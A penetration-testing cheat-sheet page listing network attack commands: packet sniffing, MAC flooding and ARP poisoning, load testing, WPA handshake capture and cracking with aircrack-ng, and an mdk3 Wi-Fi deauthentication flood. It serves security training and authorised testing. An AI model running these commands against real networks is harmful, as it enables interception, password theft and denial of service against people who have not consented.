Pentest Tips
  • ABOUT
  • Information Shares
  • CTF
    • Stego
    • Memory
  • Blue Team
    • Tools/Resources
    • One Liners
    • Threat Hunting
    • Scripts
    • Intrusion
  • Web
    • Resources
    • General Web
    • Subdomain Discovery
    • Content Discovery
    • MYSQL
    • Burpsuite
  • Network Exploitation
    • Resources
    • Kerberos
    • Network Based
    • Phishing
    • Metasploit
    • Weaponization
    • Password Cracking
    • Shell Upgrades
    • Linux PrivEsc
    • Windows PrivEsc
    • Windows Persistence
    • Exfiltration
  • Windows Internals
    • Kernal
  • Recon
    • Nmap
    • OSINT
    • SMB Enumeration
    • LDAP
    • Physical
  • Malware
    • Obfuscation
  • Scripting
    • Bash Basics
    • Powershell Basics
  • Cloud
    • AWS
  • Game Hacking
    • Resources
Powered by GitBook
On this page
  • Sniffing
  • File transfer
  • Mac Flooding (DOS)
  • Load Testing
  • Wifi Cracking
  • Wifi Deauth Flood DOS
Edit on GitHub
  1. Network Exploitation

Network Based

Sniffing

TCP Sniffing

# Basic output
tcpdump -i <interface>
# Verbose output
tcpdump -A -i <interface>
# redirect to pcap file
tcpdump -A -i <interface> -w /tmp/tcpdump.pcap

File transfer

Over SSH:

# SSH Local folder to remote
scp -r <local folder> <username>@<IP>:/<pathToFolder>

#SSH Remote folder to Local
scp -r <username>@<IP>:/<pathToFolder> .

Mac Flooding (DOS)

Dangerous. Easily detected by SOC. Can result in network device being blocked (hence potential DOS attack)

macof -i <interface>
# Does not work with Arp validation enabled
ettercap -T -i <interface> -M arp

Load Testing

# Non auth
siege -v -c 100 <url>

# Cookie Auth
siege -v -c 100 -H 'Cookie: name=value' <url>

Wifi Cracking

# List Interfaces
airmon-ng

# Stop Interface
airmon-ng stop <interface>

# Start Capture
airmon-ng start <Interface> <Channel>

# Collect Handshake
airodump-ng -c <Channel> --bssid <bssid> -w psk <interface>

# Crack Password
aircrack-ng -w wordlist psk*.cap

Wifi Deauth Flood DOS

airmon-ng start wlan0
mdk3 mon0 d -i <essid>
PreviousKerberosNextPhishing

Last updated 2 years ago

Guide:

Geeks For Geeks